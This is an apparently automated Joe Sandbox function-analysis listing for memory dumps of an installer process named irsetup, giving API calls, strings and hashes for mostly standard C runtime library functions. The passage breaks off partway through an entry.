Source File: 00000002.00000002.4678639746.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000002.00000002.4678590235.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4678718171.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4678775852.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4678805673.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd

Similarity

API ID: _ctrlfp_set_statfp$_call_matherr_exception_enabled_raise_exc
String ID:
API String ID: 932658401-0
Opcode ID: ad416f46ac546154802dd70ae447ad76da288f2288ed4676cd6c838ef0a3701b
Instruction ID: 8ea2834ca092981a7e33b9b2295afd33eedbb5ae56d736279697e7e8cc69432a
Opcode Fuzzy Hash: ad416f46ac546154802dd70ae447ad76da288f2288ed4676cd6c838ef0a3701b
Instruction Fuzzy Hash: 8D313D32608EC886D672DB15E4413EBB365FBCE394F154225FA8C5BB58DF39C5498B40

Function 000000018002F404 Relevance: 7.6, APIs: 5, Instructions: 72COMMONLIBRARYCODE

Download Yara Rule

APIs

DecodePointer.KERNEL32(?,?,?,000000018002F515,?,?,?,?,0000000180020922), ref: 000000018002F42D
DecodePointer.KERNEL32(?,?,?,000000018002F515,?,?,?,?,0000000180020922), ref: 000000018002F43C

Part of subcall function 000000018003A43C: _errno.LIBCMT ref: 000000018003A445

EncodePointer.KERNEL32(?,?,?,000000018002F515,?,?,?,?,0000000180020922), ref: 000000018002F4B9

Part of subcall function 000000018002C04C: realloc.LIBCMT ref: 000000018002C077
Part of subcall function 000000018002C04C: Sleep.KERNEL32(?,?,00000000,000000018002F4A9,?,?,?,000000018002F515,?,?,?,?,0000000180020922), ref: 000000018002C093

EncodePointer.KERNEL32(?,?,?,000000018002F515,?,?,?,?,0000000180020922), ref: 000000018002F4C8
EncodePointer.KERNEL32(?,?,?,000000018002F515,?,?,?,?,0000000180020922), ref: 000000018002F4D4

Memory Dump Source

Source File: 00000002.00000002.4678639746.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000002.00000002.4678590235.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4678718171.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4678775852.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4678805673.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd

Similarity

API ID: Pointer$Encode$Decode$Sleep_errnorealloc
String ID:
API String ID: 1310268301-0
Opcode ID: 9b59964a37983f2b84c531a821adbeb9d19dfcd695d3bb90245f03d9e5caed93
Instruction ID: c9725b456daa9fdbd47dcba6a1973a2d1d59f8ec4ab8946eea0d685f15fedc00
Opcode Fuzzy Hash: 9b59964a37983f2b84c531a821adbeb9d19dfcd695d3bb90245f03d9e5caed93
Instruction Fuzzy Hash: D221D331301A4C81EAA3AF21E8457EBA391B34D7C0F44C835BA4D0778AEEB8C28CC341

Function 00007FF7A0B67EE4 Relevance: 7.5, APIs: 5, Instructions: 39timethreadCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32 ref: 00007FF7A0B67F1B
GetCurrentProcessId.KERNEL32 ref: 00007FF7A0B67F26
GetCurrentThreadId.KERNEL32 ref: 00007FF7A0B67F32
GetTickCount.KERNEL32 ref: 00007FF7A0B67F3E
QueryPerformanceCounter.KERNEL32 ref: 00007FF7A0B67F4F

Memory Dump Source

Source File: 00000002.00000002.4678901152.00007FF7A0901000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7A0900000, based on PE: true

Associated: 00000002.00000002.4678853857.00007FF7A0900000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.4679398558.00007FF7A0C5A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.4679589544.00007FF7A0D89000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.4679643190.00007FF7A0D96000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.4679691880.00007FF7A0D99000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.4679691880.00007FF7A0DA5000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.4679691880.00007FF7A0DB7000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.4679835912.00007FF7A0DBA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.4679873075.00007FF7A0DDF000.00000010.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.4679900575.00007FF7A0DE2000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff7a0900000_irsetup.jbxd

Similarity

API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
String ID:
API String ID: 1445889803-0
Opcode ID: 9c85b3c5196d6b797aa64e67c1447ecb68c40010fb4304309066dacb49b6665b
Instruction ID: f771f636aaae0636fa68845b185ac44bf6f642e831d158279f9876a711ac9188
Opcode Fuzzy Hash: 9c85b3c5196d6b797aa64e67c1447ecb68c40010fb4304309066dacb49b6665b
Instruction Fuzzy Hash: 74016526A5AA4781EB409F21E950275A360FF49F90F862930EE5E477B4DF3CF9858710

Function 0000000180038EBC Relevance: 7.5, APIs: 5, Instructions: 39timethreadCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32 ref: 0000000180038EF3
GetCurrentProcessId.KERNEL32 ref: 0000000180038EFE
GetCurrentThreadId.KERNEL32 ref: 0000000180038F0A
GetTickCount.KERNEL32 ref: 0000000180038F16
QueryPerformanceCounter.KERNEL32 ref: 0000000180038F27

Memory Dump Source

Source File: 00000002.00000002.4678639746.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000002.00000002.4678590235.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4678718171.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4678775852.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4678805673.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd

Similarity

API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
String ID:
API String ID: 1445889803-0
Opcode ID: 155953e9e9487b941f1044b1c903ed904f3cf64617d1cd54c6d4fa03758ae0d7
Instruction ID: 243d979cf980d91638068ba1cf51c6dd2d398df9d072928e8bbb030d2aa91185
Opcode Fuzzy Hash: 155953e9e9487b941f1044b1c903ed904f3cf64617d1cd54c6d4fa03758ae0d7
Instruction Fuzzy Hash: FC015E31215A0886EBE28F21F9803966360F74DBD4F46A621FE5E477A4DF39CA9D8300

Function 00000001800324A8 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 115COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 000000018002BAAC: _errno.LIBCMT ref: 000000018002BAB5

_errno.LIBCMT ref: 00000001800324D5
_errno.LIBCMT ref: 00000001800324F1
_getbuf.LIBCMT ref: 000000018003255E

Strings

%.14g, xrefs: 00000001800324BA

Memory Dump Source

Source File: 00000002.00000002.4678639746.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000002.00000002.4678590235.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4678718171.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4678775852.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4678805673.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd

Similarity

API ID: _errno$_getbuf
String ID: %.14g
API String ID: 606515832-3267037135
Opcode ID: 31b0e7f23d037101d8f3db491ca91a05c1c77b1233f9034071453cf5650caed2
Instruction ID: d7cf500bb31369f41dd2bf305ad7167dfc6d28a841a02d62a1bb6ec0d038c543
Opcode Fuzzy Hash: 31b0e7f23d037101d8f3db491ca91a05c1c77b1233f9034071453cf5650caed2
Instruction Fuzzy Hash: 5A41C272600B4886EBAB9F28D4513AE37A0E78CFD4F168215FA6A473D6DF34CA55C740

Function 000000018000E020 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 62COMMON

Download Yara Rule

APIs

_errno.LIBCMT ref: 000000018000E0A4

Part of subcall function 0000000180022200: _errno.LIBCMT ref: 000000018002221E

Strings

attempt to use a closed file, xrefs: 000000018000E04C
FILE*, xrefs: 000000018000E02F
cur, xrefs: 000000018000E065

Memory Dump Source

Source File: 00000002.00000002.4678639746.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000002.00000002.4678590235.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4678718171.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4678775852.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4678805673.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd

Similarity

API ID: _errno
String ID: FILE*$attempt to use a closed file$cur
API String ID: 2918714741-2248676531
Opcode ID: b9167f225a1a843d12c92d94147ff570959b0eac6a117e260998413cbc5ec83f
Instruction ID: 6c949a32b7c445aad4823cac95b0331f89fcc6844e5a922ae23727c4ae02fac2
Opcode Fuzzy Hash: b9167f225a1a843d12c92d94147ff570959b0eac6a117e260998413cbc5ec83f
Instruction Fuzzy Hash: CB216F71705A4881FB92EB52E5913EA6365E78DBC0F45C022FE4917B9ACE38C74E8740

Function 000000018000E2E0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 48COMMON

Download Yara Rule

APIs

fflush.LIBCMT ref: 000000018000E31E
_errno.LIBCMT ref: 000000018000E32A

Strings

attempt to use a closed file, xrefs: 000000018000E30C
FILE*, xrefs: 000000018000E2EF

Memory Dump Source

Source File: 00000002.00000002.4678639746.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000002.00000002.4678590235.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4678718171.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4678775852.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4678805673.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd

Similarity

API ID: _errnofflush
String ID: FILE*$attempt to use a closed file
API String ID: 748766958-999929173
Opcode ID: e1f0293b8a37bcc107eab8604bf93ac0379de7c48efdfe4c912e06844dc65ac9
Instruction ID: effcfa852fb6302185ee5319f9c93b9d90322d014ae9de1df5db582a5132b004
Opcode Fuzzy Hash: e1f0293b8a37bcc107eab8604bf93ac0379de7c48efdfe4c912e06844dc65ac9
Instruction Fuzzy Hash: F7117C31704A8881FB82EB52E1913EA6361A789BC0F448022BE0917B9ACE6CC6898740

Function 000000018002E4E0 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 45COMMONLIBRARYCODE

Download Yara Rule

APIs

_getptd.LIBCMT ref: 000000018002E4EA
_lock.LIBCMT ref: 000000018002E518
free.LIBCMT ref: 000000018002E54F

Strings

%.14g, xrefs: 000000018002E4E5

Memory Dump Source

Source File: 00000002.00000002.4678639746.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000002.00000002.4678590235.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4678718171.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4678775852.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4678805673.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd

Similarity

API ID: _getptd_lockfree
String ID: %.14g
API String ID: 3892346632-3267037135
Opcode ID: e532da2cad900d3c0d80d82f3a1980227b16755320fb1000287129ea2ba09196
Instruction ID: 4a9433009a0817146d8213779e3cdba636acc00540cdeb6e6f7f8c89661ab616
Opcode Fuzzy Hash: e532da2cad900d3c0d80d82f3a1980227b16755320fb1000287129ea2ba09196
Instruction Fuzzy Hash: A8115E31261B8882EAD79B50E4807E873A0F78DBC8F498125FA1D03791DF34CA5DC701

Function 00000001800207F0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 17libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(?,?,000000FF,0000000180020839,?,?,00000028,000000018002D429,?,?,00000000,000000018002BF80,?,?,00000000,000000018002D26D), ref: 00000001800207FF
GetProcAddress.KERNEL32(?,?,000000FF,0000000180020839,?,?,00000028,000000018002D429,?,?,00000000,000000018002BF80,?,?,00000000,000000018002D26D), ref: 0000000180020814

Strings

CorExitProcess, xrefs: 000000018002080A
mscoree.dll, xrefs: 00000001800207F8

Memory Dump Source

Source File: 00000002.00000002.4678639746.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000002.00000002.4678590235.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4678718171.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4678775852.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4678805673.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 1646373207-1276376045
Opcode ID: 143e8cc6326776dad3d0c38c552a3e355c10da91fdedafbeeb96d0b3556e98d8
Instruction ID: 8eca91b44297037b0ac9d1d6b010f20b8df3b1a68d07564286341e8c3e27f513
Opcode Fuzzy Hash: 143e8cc6326776dad3d0c38c552a3e355c10da91fdedafbeeb96d0b3556e98d8
Instruction Fuzzy Hash: D7E01234B11B0851FE9B5F91A8E43A51390AB4C780F499829985E06391DF68878D8394

Function 0000000180028C50 Relevance: 6.4, APIs: 5, Instructions: 134COMMON

Download Yara Rule

APIs

Part of subcall function 000000018002BF5C: malloc.LIBCMT ref: 000000018002BF7B
Part of subcall function 000000018002BF5C: Sleep.KERNEL32(?,?,00000000,000000018002D26D,?,?,00000000,000000018002D317,?,?,00000000,000000018002C1F5,?,?,00000000,000000018002C2AC), ref: 000000018002BF92

Part of subcall function 000000018002FF88: _errno.LIBCMT ref: 000000018002FFA3

free.LIBCMT ref: 0000000180028D99
free.LIBCMT ref: 0000000180028DB5

Part of subcall function 000000018002BB84: RtlCaptureContext.KERNEL32 ref: 000000018002BBC3
Part of subcall function 000000018002BB84: RtlLookupFunctionEntry.KERNEL32 ref: 000000018002BBDC
Part of subcall function 000000018002BB84: RtlVirtualUnwind.KERNEL32 ref: 000000018002BC1A
Part of subcall function 000000018002BB84: IsDebuggerPresent.KERNEL32 ref: 000000018002BC61
Part of subcall function 000000018002BB84: SetUnhandledExceptionFilter.KERNEL32 ref: 000000018002BC6B
Part of subcall function 000000018002BB84: UnhandledExceptionFilter.KERNEL32 ref: 000000018002BC76
Part of subcall function 000000018002BB84: GetCurrentProcess.KERNEL32 ref: 000000018002BC8C
Part of subcall function 000000018002BB84: TerminateProcess.KERNEL32 ref: 000000018002BC9A

free.LIBCMT ref: 0000000180028DCA

Part of subcall function 000000018001F30C: RtlFreeHeap.NTDLL(?,?,00000000,000000018002C2C0,?,?,?,000000018001E8ED,?,?,?,?,0000000180026772), ref: 000000018001F322
Part of subcall function 000000018001F30C: _errno.LIBCMT ref: 000000018001F32C
Part of subcall function 000000018001F30C: GetLastError.KERNEL32(?,?,00000000,000000018002C2C0,?,?,?,000000018001E8ED,?,?,?,?,0000000180026772), ref: 000000018001F334

free.LIBCMT ref: 0000000180028DE9
free.LIBCMT ref: 0000000180028E05

Memory Dump Source

Source File: 00000002.00000002.4678639746.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000002.00000002.4678590235.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4678718171.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4678775852.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4678805673.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd

Similarity

API ID: free$ExceptionFilterProcessUnhandled_errno$CaptureContextCurrentDebuggerEntryErrorFreeFunctionHeapLastLookupPresentSleepTerminateUnwindVirtualmalloc
String ID:
API String ID: 1498969394-0
Opcode ID: 4ee83ada38aec8174198e6d25d5b418d62bd8dae8a883d0a04d60064cdfc57a1
Instruction ID: e4a9b29ca778be11defb2c39dc2281dcbbc2f6ed8a753c597f6380265792a982
Opcode Fuzzy Hash: 4ee83ada38aec8174198e6d25d5b418d62bd8dae8a883d0a04d60064cdfc57a1
Instruction Fuzzy Hash: 1D517236201E4886EBA39F25E8403DD3355F788BD8F598026FE8D47795DE38CA8AC344

Function 0000000180029078 Relevance: 6.2, APIs: 4, Instructions: 186COMMON

Download Yara Rule

APIs

_getptd.LIBCMT ref: 00000001800290AA

Part of subcall function 0000000180028E38: _getptd.LIBCMT ref: 0000000180028E72

Memory Dump Source

Source File: 00000002.00000002.4678639746.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000002.00000002.4678590235.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4678718171.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4678775852.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4678805673.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd

Similarity

API ID: _getptd
String ID:
API String ID: 3186804695-0
Opcode ID: c0d3ae45891e9377bb4204286041f6db8ff33de922250e1434e3fc09dcfaf439
Instruction ID: 8693baa525cc390d4e04389ed9084d09a48d9bf4543c762d9cd6e86b7275e954
Opcode Fuzzy Hash: c0d3ae45891e9377bb4204286041f6db8ff33de922250e1434e3fc09dcfaf439
Instruction Fuzzy Hash: 5281B072205B8996EBA6DF65E1847DE73A0F3487C4F508126EB8D43B94DF38D258CB00

Function 0000000180039880 Relevance: 6.1, APIs: 4, Instructions: 139COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 000000018002D20C: _FF_MSGBANNER.LIBCMT ref: 000000018002D233

_lock.LIBCMT ref: 00000001800398BE
_lock.LIBCMT ref: 0000000180039917
EnterCriticalSection.KERNEL32 ref: 0000000180039956
LeaveCriticalSection.KERNEL32 ref: 0000000180039966

Memory Dump Source

Source File: 00000002.00000002.4678639746.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000002.00000002.4678590235.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4678718171.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4678775852.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4678805673.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd

Similarity

API ID: CriticalSection_lock$EnterLeave
String ID:
API String ID: 2641352136-0
Opcode ID: 33db83eaa1e316c93853d291dc9a5ec5e343c6e9d5295868659055a985429795
Instruction ID: f39b5f0a46982969517bee665c5b07b8d69fc09acf0904b0d854b37e53922783
Opcode Fuzzy Hash: 33db83eaa1e316c93853d291dc9a5ec5e343c6e9d5295868659055a985429795
Instruction Fuzzy Hash: 9D510932201B8886EB93CF55E4403AA7791F7987E8F46C216FA5A067E5CF78C619C701

Function 00000001800295A4 Relevance: 6.1, APIs: 4, Instructions: 122COMMON

Download Yara Rule

APIs

_errno.LIBCMT ref: 00000001800295CB

Part of subcall function 000000018002BCAC: DecodePointer.KERNEL32 ref: 000000018002BCD3

_getptd.LIBCMT ref: 00000001800295F1
_lock.LIBCMT ref: 000000018002962A
_lock.LIBCMT ref: 00000001800296BD

Memory Dump Source

Source File: 00000002.00000002.4678639746.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000002.00000002.4678590235.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4678718171.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4678775852.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4678805673.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd

Similarity

API ID: _lock$DecodePointer_errno_getptd
String ID:
API String ID: 4201827665-0
Opcode ID: cdde0ef7817295929428664d31e209b21e59383b411da0fe62d0ca1bae79407c
Instruction ID: 460a503547ebc5d843fb0f47162114160bb622de7595eaa0c997af710718bdb1
Opcode Fuzzy Hash: cdde0ef7817295929428664d31e209b21e59383b411da0fe62d0ca1bae79407c
Instruction Fuzzy Hash: D151AC31602A8886F7D7EB25E884BEA2391FB4D7C8F11C525FE5A43792DE78C6498704

Function 000000018002C178 Relevance: 6.0, APIs: 4, Instructions: 44COMMON

Download Yara Rule

APIs

FlsFree.KERNEL32(?,?,?,?,0000000180029F37), ref: 000000018002C187
DeleteCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000180029F37), ref: 000000018002D1A6
free.LIBCMT ref: 000000018002D1AF
DeleteCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000180029F37), ref: 000000018002D1CF

Memory Dump Source

Source File: 00000002.00000002.4678639746.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000002.00000002.4678590235.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4678718171.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4678775852.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4678805673.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd

Similarity

API ID: CriticalDeleteSection$Freefree
String ID:
API String ID: 1250194111-0
Opcode ID: d778b9450493a088483ca8ae6e5173535179b62c543e66aa7f4c25907cef4323
Instruction ID: 70892d1e86e0fe61b579319fcbecef8552250517042c71bfe73d972997a8cc6e
Opcode Fuzzy Hash: d778b9450493a088483ca8ae6e5173535179b62c543e66aa7f4c25907cef4323
Instruction Fuzzy Hash: 51119E31605A4CD6FBA78B11E9503A97360E70DBE4F588212FA5502B95CF68CAA9C701

Function 000000018001E96C Relevance: 6.0, APIs: 4, Instructions: 42COMMONLIBRARYCODE

Download Yara Rule

APIs

_errno.LIBCMT ref: 000000018001E981

Part of subcall function 000000018002BCAC: DecodePointer.KERNEL32 ref: 000000018002BCD3

_flush.LIBCMT ref: 000000018001E9AA
_freebuf.LIBCMT ref: 000000018001E9B4

Memory Dump Source

Source File: 00000002.00000002.4678639746.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000002.00000002.4678590235.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4678718171.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4678775852.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4678805673.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd

Similarity

API ID: DecodePointer_errno_flush_freebuf
String ID:
API String ID: 1889905870-0
Opcode ID: 2ae9cf7a8c2a355d5a7111981e7cb442d45bfb4cbdb5125c3947bd730f3ae73c
Instruction ID: 21c6b32f25e86580c02bfc281b2be964b159bf8c721c44a871fe3adfba9ac30f
Opcode Fuzzy Hash: 2ae9cf7a8c2a355d5a7111981e7cb442d45bfb4cbdb5125c3947bd730f3ae73c
Instruction Fuzzy Hash: 6801D432614A8842FFE7EA7598123FD12516B9E7E8F29C322BA15871D2CE38C6088301

Function 000000018003972C Relevance: 6.0, APIs: 4, Instructions: 36COMMONLIBRARYCODE

Download Yara Rule

APIs

__doserrno.LIBCMT ref: 0000000180039735
_errno.LIBCMT ref: 000000018003973D

Memory Dump Source

Source File: 00000002.00000002.4678639746.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000002.00000002.4678590235.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4678718171.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4678775852.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4678805673.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd

Similarity

API ID: __doserrno_errno
String ID:
API String ID: 921712934-0
Opcode ID: 9747b211fa7aa75ef0586c585c49f8864b2e4b48e6be273d406063ce42c8b046
Instruction ID: 222b8468457cde4f875127d20ef24c91f9358582f200ea179a318cfe432f40bb
Opcode Fuzzy Hash: 9747b211fa7aa75ef0586c585c49f8864b2e4b48e6be273d406063ce42c8b046
Instruction Fuzzy Hash: 54012B72625A8C41FB975FA9C8513FD275197997E5F92C302FA2E063E2CF3C42088701

Function 0000000180028434 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 136COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 000000018001F6B0: _getptd.LIBCMT ref: 000000018001F6C6

_errno.LIBCMT ref: 00000001800285BC
_errno.LIBCMT ref: 00000001800285F6

Strings

#, xrefs: 0000000180028554

Memory Dump Source

Source File: 00000002.00000002.4678639746.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000002.00000002.4678590235.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4678718171.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4678775852.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4678805673.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd

Similarity

API ID: _errno$_getptd
String ID: #
API String ID: 3432092939-1885708031
Opcode ID: 581a0b2716e9520c78d58f123274437518bb154b9191c5d7100b2b71d979de97
Instruction ID: a15908a98ec50fe91217ef7d26e318360d1aa3a5f1900967077516d825dfa4f5
Opcode Fuzzy Hash: 581a0b2716e9520c78d58f123274437518bb154b9191c5d7100b2b71d979de97
Instruction Fuzzy Hash: B5518236206BD885E7A38F15E4403EEBBA0F789B94F548111EB8953B55CE39C949DB01

Function 00000001800265D0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100COMMON

Download Yara Rule

APIs

Part of subcall function 000000018001F6B0: _getptd.LIBCMT ref: 000000018001F6C6

_errno.LIBCMT ref: 0000000180026609
_errno.LIBCMT ref: 0000000180026707

Strings

-, xrefs: 00000001800266D9

Memory Dump Source

Source File: 00000002.00000002.4678639746.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000002.00000002.4678590235.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4678718171.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4678775852.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4678805673.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd

Similarity

API ID: _errno$_getptd
String ID: -
API String ID: 3432092939-2547889144
Opcode ID: d8eb24f12b1e7f04df8eae803c5dec19a6ac15cb438d744559f954a93dff403f
